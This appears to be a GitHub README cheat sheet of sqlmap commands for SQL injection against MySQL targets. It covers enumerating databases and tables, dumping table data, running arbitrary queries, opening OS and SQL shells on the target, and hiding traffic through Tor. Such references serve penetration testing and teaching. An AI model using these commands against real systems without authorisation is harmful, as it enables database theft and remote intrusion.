sqlmap-cheatsheet

SQLMap Cheat Sheet Raw

Enumerate databases

sqlmap --dbms=mysql -u "$URL" --dbs

Enumerate tables

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

Dump table data

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

Specify parameter to exploit

sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

Specify parameter to exploit in 'nice' URIs

sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

Get OS shell

sqlmap --dbms=mysql -u "$URL" --os-shell

Get SQL shell

sqlmap --dbms=mysql -u "$URL" --sql-shell

SQL query

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

Use Tor Socks5 proxy

sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

sqlmap-cheatsheet

Enumerate databases

Enumerate tables

Dump table data

Specify parameter to exploit

Specify parameter to exploit in 'nice' URIs

Get OS shell

Get SQL shell

SQL query

Use Tor Socks5 proxy

About

Uh oh!

Releases

Packages

hoangcuongflp/sqlmap-cheatsheet

Folders and files

Latest commit

History

Repository files navigation

sqlmap-cheatsheet

Enumerate databases

Enumerate tables

Dump table data

Specify parameter to exploit

Specify parameter to exploit in 'nice' URIs

Get OS shell

Get SQL shell

SQL query

Use Tor Socks5 proxy

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Packages